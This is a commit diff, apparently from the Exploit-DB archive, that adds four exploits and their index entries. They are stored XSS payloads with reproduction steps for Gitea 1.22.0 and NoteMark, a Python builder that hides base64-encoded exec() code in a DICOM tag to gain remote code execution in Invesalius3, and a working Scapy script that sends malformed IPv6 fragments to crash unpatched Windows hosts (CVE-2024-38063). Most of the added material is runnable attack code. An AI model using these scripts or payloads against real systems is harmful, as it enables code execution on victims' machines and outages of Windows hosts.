DB: 2024-08-29

5 changes to exploits/shellcodes/ghdb Gitea 1.22.0 - Stored XSS NoteMark < 0.13.0 - Stored XSS Invesalius3 - Remote Code Execution Windows TCP/IP - RCE Checker and Denial of Service
2024-08-29 00:16:41 +00:00 · 2024-08-29 00:16:41 +00:00 · 32e0cc5e7f
commit 32e0cc5e7f
parent 76d99ff06e
5 changed files with 280 additions and 0 deletions
--- a/exploits/multiple/webapps/52077.txt
+++ b/exploits/multiple/webapps/52077.txt
@ -0,0 +1,20 @@
+# Exploit Title: Stored XSS in Gitea
+# Date: 27/08/2024
+# Exploit Authors: Catalin Iovita & Alexandru Postolache
+# Vendor Homepage: (https://github.com/go-gitea/gitea)
+# Version: 1.22.0
+# Tested on: Linux 5.15.0-107, Go 1.23.0
+# CVE: CVE-2024-6886
+
+## Vulnerability Description
+Gitea 1.22.0 is vulnerable to a Stored Cross-Site Scripting (XSS) vulnerability. This vulnerability allows an attacker to inject malicious scripts that get stored on the server and executed in the context of another user's session.
+
+## Steps to Reproduce
+1. Log in to the application.
+2. Create a new repository or modify an existing repository by clicking the Settings button from the `$username/$repo_name/settings` endpoint.
+3. In the Description field, input the following payload:
+
+    <a href=javascript:alert()>XSS test</a>
+
+4. Save the changes.
+5. Upon clicking the repository description, the payload was successfully injected in the Description field. By clicking on the message, an alert box will appear, indicating the execution of the injected script.
--- a/exploits/multiple/webapps/52078.txt
+++ b/exploits/multiple/webapps/52078.txt
@ -0,0 +1,35 @@
+# Exploit Title: Stored XSS in NoteMark
+# Date: 07/29/2024
+# Exploit Author: Alessio Romano (sfoffo)
+# Vendor Homepage: https://notemark.docs.enchantedcode.co.uk/
+# Version: 0.13.0 and below
+# Tested on: Linux
+# References:
+https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-41819,
+https://github.com/enchant97/note-mark/commit/a0997facb82f85bfb8c0d497606d89e7d150e182,
+https://github.com/enchant97/note-mark/security/advisories/GHSA-rm48-9mqf-8jc3
+# CVE: CVE-2024-41819
+
+## Steps to Reproduce
+1. Log in to the application.
+2. Create a new note or enter a previously created note.
+3. Access the note editor functionality from the selected note by clicking
+on the "Editor" tab.
+4. Input the following payload:
+[xss-link](javascript:alert(1))
+5. Save the changes.
+6. Click on the "Rendered" tab to view the rendered markdown version of the
+note. Click on the previously created link to pop the injected alert.
+
+## HTTP Request PoC
+
+PUT /api/notes/<note-uuid>/content HTTP/1.1
+Host: localhost:8000
+Accept: */*
+Content-Type: text/plain;charset=UTF-8
+Content-Length: 34
+Sec-Fetch-Site: same-origin
+Authorization: Bearer <TOKEN>
+
+
+[xss-link](javascript:alert(1))
--- a/exploits/python/webapps/52076.py
+++ b/exploits/python/webapps/52076.py
@ -0,0 +1,95 @@
+# Exploit Title: Invesalius 3.1 - Remote Code Execution (RCE)
+# Discovered By: Alessio Romano (sfoffo), Riccardo Degli Esposti (partywave)
+# Exploit Author: Alessio Romano (sfoffo), Riccardo Degli Esposti
+#(partywave)
+# Date: 23/08/2024
+# Vendor Homepage: https://invesalius.github.io/
+# Software Link:
+#https://github.com/invesalius/invesalius3/tree/master/invesalius
+# Version: 3.1.99991 to 3.1.99998
+# Tested on: Windows
+# CVE: CVE-2024-42845
+# External References:
+#https://notes.sfoffo.com/contributions/2024-contributions/cve-2024-42845,
+#https://github.com/partywavesec/invesalius3_vulnerabilities/tree/main/CVE-2024-42845,
+#https://www.partywave.site/show/research/Tic%20TAC%20-%20Beware%20of%20your%20scan
+
+# Description:
+#----------------
+#
+#A Remote Code Execution (RCE) vulnerability exists in the DICOM file import
+#procedure in Invesalius3. This vulnerability afflicts all versions from
+#3.1.99991 to 3.1.99998. The exploitation steps of this vulnerability
+#involve the use of a crafted DICOM file which, once imported inside the
+#victim's client application allows an attacker to gain remote code
+#execution over the victim's machine.
+
+# Script:
+#----------------
+#
+###
+# The script below creates a specifically crafted DICOM payload for
+#CVE-2024-42845. Remote Code Execution is gained once the DICOM file is
+#imported inside the victim's client application.
+###
+import pydicom
+import base64
+import argparse
+
+pydicom.config.settings.reading_validation_mode = pydicom.config.IGNORE
+
+
+def encode_payload(plain_payload):
+    data = open(plain_payload, 'rb').read()
+    return f"exec(__import__('base64').b64decode({base64.b64encode(data)})"
+
+def prepare_dicom_payload(dicom_file_path, payload):
+    try:
+        dicom_data = pydicom.dcmread(dicom_file_path)
+
+        values = dicom_data[0x0020, 0x0032].value
+        mal = [str(i) for i in values]
+        mal.append(encode_payload(payload))
+
+    except pydicom.errors.InvalidDicomError:
+        print("The file is not a valid DICOM file.")
+    except Exception as e:
+        print(f"An error occurred: {e}")
+
+    return mal
+
+
+def modify_dicom_field(dicom_file_path, malicious_tag, outfile, sign):
+    try:
+        dicom_dataset = pydicom.dcmread(dicom_file_path)
+        if sign:
+            dicom_dataset.Manufacturer = "Malicious DICOM file creator"
+            dicom_dataset.InstitutionName = "Malicious DICOM file institution"
+        elem =  pydicom.dataelem.DataElement(0x00200032, 'CS', malicious_tag)
+        dicom_dataset[0x00200032] = elem
+        print(dicom_dataset)
+        dicom_dataset.save_as(outfile)
+    except Exception as e:
+        print(f"An error occurred: {e}")
+
+
+if __name__ == "__main__":
+    parser = argparse.ArgumentParser(description='Read a DICOM file.')
+    parser.add_argument('--dicom', required=True, help='Path to the input DICOM file')
+    parser.add_argument('--outfile', required=True, help='Path to the output DICOM file')
+    parser.add_argument('--payload', required=False, default=b"print('Test')", help='File that contains the malicious plain python3 code')
+    parser.add_argument('--signature', required=False, default=True)
+
+    args = parser.parse_args()
+    dicom_infile_path = args.dicom
+    dicom_outfile_path = args.outfile
+    print(args.signature)
+
+    tmp_tag = prepare_dicom_payload(dicom_infile_path, payload=args.payload)
+    if tmp_tag:
+        malicious_tag = '\\'.join(tmp_tag)
+
+        modify_dicom_field(dicom_infile_path, malicious_tag, dicom_outfile_path, sign=args.signature)
+        exit(0)
+    else:
+        exit(1)
--- a/exploits/windows/dos/52075.py
+++ b/exploits/windows/dos/52075.py
@ -0,0 +1,126 @@
+#!/usr/bin/env python3
+# -*- coding: utf-8 -*-
+
+# Exploit Title: Windows IPv6 CVE-2024-38063 Checker and Denial-Of-Service
+# Date: 2024-08-07
+# Exploit Author: Photubias
+# Vendor Homepage: https://microsoft.com
+# Vendor Advisory: [1] https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-38063
+# Version: Windows 10, 11 <10.0.26100.1457 and Server 2016-2019-2022 <10.0.17763.6189
+# Tested on: Windows 11 23H2 and Windows Server 2022
+# CVE: CVE-2024-38063
+
+import os, subprocess, re, time, sys
+
+## Variables
+sDstIP = 'fe80::78b7:6283:49ad:c565'        ## Placeholder
+if len(sys.argv) > 1: sDstIP = sys.argv[1]  ## Please provide an argument
+sDstMAC = '00:0C:29:55:E1:C8'               ## Not required, will try to get the MAC via Neighbor Discovery
+iBatches = 20
+iCorruptions = 20                           ## How many times do we want to corrupt the tcpip.sys memory per batch
+
+try:
+    print('--- Loading Scapy, might take some time ...')
+    from scapy.config import conf
+    conf.ipv6_enabled = False
+    import scapy.all as scapy
+    scapy.conf.verb = 0
+except:
+    print('Error while loading scapy, please run "pip install scapy"')
+    exit(1)
+
+import logging
+logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
+
+def selectInterface(): #adapter[] = npfdevice, ip, mac
+    def getAllInterfaces():
+        lstInterfaces=[]
+        if os.name == 'nt':
+            proc = subprocess.Popen('getmac /NH /V /FO csv | FINDSTR /V /I disconnected', shell=True, stdout=subprocess.PIPE)
+            for bInterface in proc.stdout.readlines():
+                lstInt = bInterface.split(b',')
+                sAdapter = lstInt[0].strip(b'"').decode()
+                sDevicename = lstInt[1].strip(b'"').decode()
+                sMAC = lstInt[2].strip(b'"').decode().lower().replace('-', ':')
+                sWinguID = lstInt[3].strip().strip(b'"').decode()[-38:]
+                proc = subprocess.Popen('netsh int ipv6 show addr "{}" | FINDSTR /I Address'.format(sAdapter), shell=True, stdout=subprocess.PIPE)
+                try: sIP = re.findall(r'[\w:]+:+[\w:]+', proc.stdout.readlines()[0].strip().decode())[0]
+                except: sIP = ''
+                if len(sMAC) == 17: lstInterfaces.append([sAdapter, sIP, sMAC, sDevicename, sWinguID]) # When no or bad MAC address (e.g. PPP adapter), do not add
+        else:
+            proc = subprocess.Popen('for i in $(ip address | grep -v "lo" | grep "default" | cut -d":" -f2 | cut -d" " -f2);do echo $i $(ip address show dev $i | grep "inet6 " | cut -d" " -f6 | cut -d"/" -f1) $(ip address show dev $i | grep "ether" | cut -d" " -f6);done', shell=True, stdout=subprocess.PIPE)
+            for bInterface in proc.stdout.readlines():
+                lstInt = bInterface.strip().split(b' ')
+                try:
+                    if len(lstInt[2]) == 17: lstInterfaces.append([lstInt[0].decode(), lstInt[1].decode(), lstInt[2].decode(), '', ''])
+                except: pass
+        return lstInterfaces
+
+    lstInterfaces = getAllInterfaces()
+    if len(lstInterfaces) > 1:
+        i = 1
+        for lstInt in lstInterfaces: #array of arrays: adapter, ip, mac, windows devicename, windows guID
+            print('[{}] {} has {} ({})'.format(i, lstInt[2], lstInt[1], lstInt[0]))
+            i += 1
+        #sAnswer = input('[?] Please select the adapter [1]: ')
+        sAnswer='3'
+    else: sAnswer = None
+    if not sAnswer or sAnswer == '' or not sAnswer.isdigit() or int(sAnswer) >= i: sAnswer = 1
+    iAnswer = int(sAnswer) - 1
+    sNPF = lstInterfaces[iAnswer][0]
+    sIP = lstInterfaces[iAnswer][1]
+    sMAC = lstInterfaces[iAnswer][2]
+    if os.name == 'nt': sNPF = r'\Device\NPF_' + lstInterfaces[iAnswer][4]
+    return (sNPF, sIP, sMAC, lstInterfaces[iAnswer][3])
+
+def get_packets(iID, sDstIPv6, sDstMac=None):
+    iFragID = 0xbedead00 + iID
+    oPacket1 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrDestOpt(options=[scapy.PadN(otype=0x81, optdata='bad')])
+    oPacket2 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 1, offset = 0) / 'notalive'
+    oPacket3 = scapy.IPv6(fl=1, hlim=64+iID, dst=sDstIPv6) / scapy.IPv6ExtHdrFragment(id=iFragID, m = 0, offset = 1)
+    if sDstMac: ## Should always be this, it seems sending to 'ff:ff:ff:ff:ff:ff' does not work
+        oPacket1 = scapy.Ether(dst=sDstMac) / oPacket1
+        oPacket2 = scapy.Ether(dst=sDstMac) / oPacket2
+        oPacket3 = scapy.Ether(dst=sDstMac) / oPacket3
+    return [oPacket1, oPacket2, oPacket3]
+
+def doIPv6ND(sDstIP, sInt): ## Try to get a MAC address via IPv6 Neighbour Sollicitation
+    sMACResp = None
+    oNeighborSollicitation = scapy.IPv6(dst=sDstIP) / scapy.ICMPv6ND_NS(tgt=sDstIP) / scapy.ICMPv6NDOptSrcLLAddr(lladdr='ff:ff:ff:ff:ff:ff')
+    oResponse = scapy.sr1(oNeighborSollicitation, timeout=5, iface=sInt)
+    if oResponse and scapy.ICMPv6NDOptDstLLAddr in oResponse:
+        sMACResp = oResponse[scapy.ICMPv6NDOptDstLLAddr].lladdr
+    return sMACResp
+
+lstInt = selectInterface() ## NPF, IPv6, MAC, Name
+
+sMAC = doIPv6ND(sDstIP, lstInt[0])
+if sMAC:
+    print(f'[+] Target {sDstIP} is reachable, got MAC Address {sMAC}')
+    sDstMAC = sMAC
+elif sDstMAC != '':
+    print('[-] Target not responding to Neighbor Sollicitation Packets, using the provided MAC {}'.format(sDstMAC))
+else:
+    print('[-] Without a MAC address, this exploit will probably not work')
+
+lstPacketsToSend = []
+for i in range(iBatches):
+    for j in range(iCorruptions):
+        lstPacketsToSend += get_packets(j, sDstIP, sDstMAC) + get_packets(j, sDstIP, sDstMAC)
+
+## 'send' is Layer3 (let scapy figure out the MAC address), 'sendp' is L2 (MAC address is filled in, much better)
+print('[i] Verifying vulnerability against IPv6 address {}'.format(sDstIP))
+## Verification first: "ICMPv6ParamProblem"
+lstResp = scapy.srp1(lstPacketsToSend[0], iface=lstInt[0], timeout=5)
+if lstResp and scapy.IPv6 in lstResp[0] and scapy.ICMPv6ParamProblem in lstResp[0]:
+    print('[+] Yes, {} is vulnerable and exploitable for CVE-2024-38063'.format(sDstIP))
+else:
+    input('[-] Not vulnerable or firewall is enabled. Please verify and rerun or press enter to continue')
+print('[i] Waiting 10 seconds to let the target cool down (more is better)')
+time.sleep(10)
+input('[?] OK, continue to execute the Denial Of Service (BSOD)? Press Ctrl+C to cancel now')
+########## Exploit
+print('[+] Sending {} packets now via interface {} {}'.format(len(lstPacketsToSend), lstInt[0], lstInt[3]))
+scapy.conf.verb = 1
+scapy.sendp(lstPacketsToSend, iface=lstInt[0])
+print('[+] All packets are sent, now it takes *exactly* 60 seconds for the target to crash')
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11914,6 +11914,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 47407,exploits/multiple/webapps/47407.txt,"Gila CMS < 1.11.1 - Local File Inclusion",2019-09-23,"Sainadh Jamalpur",webapps,multiple,,2019-09-23,2019-09-23,0,CVE-2019-16679,,,,http://www.exploit-db.comgila-1.10.9.zip,
 49571,exploits/multiple/webapps/49571.py,"Gitea 1.12.5 - Remote Code Execution (Authenticated)",2021-02-18,Podalirius,webapps,multiple,,2021-02-18,2021-06-14,0,,,,,,
 51009,exploits/multiple/webapps/51009.rb,"Gitea 1.16.6 - Remote Code Execution (RCE) (Metasploit)",2022-09-15,samguy,webapps,multiple,,2022-09-15,2023-08-02,1,CVE-2022-30781,,,,,
+52077,exploits/multiple/webapps/52077.txt,"Gitea 1.22.0 - Stored XSS",2024-08-28,"Catalin Iovita_ Alexandru Postolache",webapps,multiple,,2024-08-28,2024-08-28,0,,,,,,
 44996,exploits/multiple/webapps/44996.py,"Gitea 1.4.0 - Remote Code Execution",2018-07-04,"Kacper Szurek",webapps,multiple,,2018-07-10,2018-07-10,0,,,,,,https://security.szurek.pl/gitea-1-4-0-unauthenticated-rce.html
 49383,exploits/multiple/webapps/49383.py,"Gitea 1.7.5 - Remote Code Execution",2021-01-06,1F98D,webapps,multiple,,2021-01-06,2021-04-01,1,CVE-2019-11229,,,,,
 42392,exploits/multiple/webapps/42392.py,"GitHub Enterprise < 2.8.7 - Remote Code Execution",2017-03-15,orange,webapps,multiple,,2017-07-29,2017-07-29,0,,,,,,http://blog.orange.tw/2017/07/how-i-chained-4-vulnerabilities-on.html
@ -12110,6 +12111,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 49813,exploits/multiple/webapps/49813.py,"NodeBB Plugin Emoji 3.2.1 - Arbitrary File Write",2021-04-29,1F98D,webapps,multiple,,2021-04-29,2021-04-29,0,,,,,,
 48528,exploits/multiple/webapps/48528.txt,"NOKIA VitalSuite SPM 2020 - 'UserName' SQL Injection",2020-05-28,"Berk Dusunur",webapps,multiple,,2020-05-28,2020-05-28,0,,,,,,
 49093,exploits/multiple/webapps/49093.txt,"nopCommerce Store 4.30 - 'name' Stored Cross-Site Scripting",2020-11-24,"Hemant Patidar",webapps,multiple,,2020-11-24,2021-01-06,0,CVE-2020-29475,,,,,
+52078,exploits/multiple/webapps/52078.txt,"NoteMark < 0.13.0 - Stored XSS",2024-08-28,"Alessio Romano (sfoffo)",webapps,multiple,,2024-08-28,2024-08-28,0,,,,,,
 21082,exploits/multiple/webapps/21082.txt,"novell sentinel log manager 1.2.0.1 - Directory Traversal",2011-12-18,"Andrea Fabrizi",webapps,multiple,,2012-09-05,2012-09-05,0,CVE-2011-5028;OSVDB-77948,,,,,
 37569,exploits/multiple/webapps/37569.txt,"ntop - 'arbfile' Cross-Site Scripting",2012-08-03,"Marcos Garcia",webapps,multiple,,2012-08-03,2015-07-11,1,,,,,,https://www.securityfocus.com/bid/54792/info
 38836,exploits/multiple/webapps/38836.txt,"ntop-ng 2.0.151021 - Privilege Escalation",2015-12-01,"Dolev Farhi",webapps,multiple,,2015-12-01,2015-12-01,0,CVE-2015-8368;OSVDB-131121,,,,,
@ -34984,6 +34986,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 51992,exploits/python/webapps/51992.py,"djangorestframework-simplejwt 5.3.1 - Information Disclosure",2024-04-15,"Dhrumil Mistry",webapps,python,,2024-04-15,2024-04-15,0,CVE-2024-22513,,,,,
 51580,exploits/python/webapps/51580.txt,"Frappe Framework (ERPNext) 13.4.0 - Remote Code Execution (Authenticated)",2023-07-11,"Sander Ferdinand",webapps,python,,2023-07-11,2023-07-11,0,,,,,,
 49495,exploits/python/webapps/49495.py,"Home Assistant Community Store (HACS) 1.10.0 - Directory Traversal",2021-01-29,Lyghtnox,webapps,python,,2021-01-29,2021-11-01,0,,,,,,
+52076,exploits/python/webapps/52076.py,"Invesalius3 - Remote Code Execution",2024-08-28,"Alessio Romano (sfoffo)_ Riccardo Degli Esposti (partywave)",webapps,python,,2024-08-28,2024-08-28,0,,,,,,
 46386,exploits/python/webapps/46386.py,"Jinja2 2.10 - 'from_string' Server Side Template Injection",2019-02-15,JameelNabbo,webapps,python,,2019-02-15,2019-02-15,0,CVE-2019-8341,,,,http://www.exploit-db.comJinja2-2.10.tar.gz,
 51109,exploits/python/webapps/51109.txt,"Label Studio 1.5.0 - Authenticated Server Side Request Forgery (SSRF)",2023-03-28,"Ryan Smith",webapps,python,,2023-03-28,2023-03-28,0,CVE-2022-36551,,,,,
 40799,exploits/python/webapps/40799.txt,"Mezzanine 4.2.0 - Cross-Site Scripting",2016-11-21,"Curesec Research Team",webapps,python,80,2016-11-21,2016-11-21,0,,,,,http://www.exploit-db.commezzanine-4.2.0.tar.gz,
@ -39323,6 +39326,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
 46554,exploits/windows/dos/46554.py,"WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 - Denial of Service",2019-03-18,Achilles,dos,windows,,2019-03-18,2019-03-18,0,,"Buffer Overflow",,,http://www.exploit-db.comWinAVI_iPod_3GP_MP4_PSP_Converter.exe,
 14034,exploits/windows/dos/14034.pl,"Wincalc 2 - '.num' Local Buffer Overflow (PoC)",2010-06-24,Madjix,dos,windows,,2010-06-24,2010-06-24,1,,,,http://www.exploit-db.com/screenshots/idlt14500/14034.png,http://www.exploit-db.comwcru32z.exe,
 12687,exploits/windows/dos/12687.pl,"WinDirectAudio 1.0 - '.wav' (PoC)",2010-05-21,ahwak2000,dos,windows,,2010-05-20,,1,,,,,,
+52075,exploits/windows/dos/52075.py,"Windows TCP/IP - RCE Checker and Denial of Service",2024-08-28,Photubias,dos,windows,,2024-08-28,2024-08-28,0,,,,,,
 1353,exploits/windows/dos/1353.py,"WinEggDropShell 1.7 - Multiple Remote Stack Overflows (PoC)",2005-12-02,Sowhat,dos,windows,,2005-12-01,,1,OSVDB-21542;CVE-2005-3992,,,,,
 625,exploits/windows/dos/625.pl,"WinFTP Server 1.6 - Denial of Service",2004-11-11,KaGra,dos,windows,,2004-11-10,,1,OSVDB-62442,,,,,
 2952,exploits/windows/dos/2952.py,"WinFTP Server 2.0.2 - 'PASV' Remote Denial of Service",2006-12-19,shinnai,dos,windows,,2006-12-18,2016-12-23,1,OSVDB-32362;CVE-2006-6673,,,,http://www.exploit-db.comWinFtpServer_2.0.2.exe,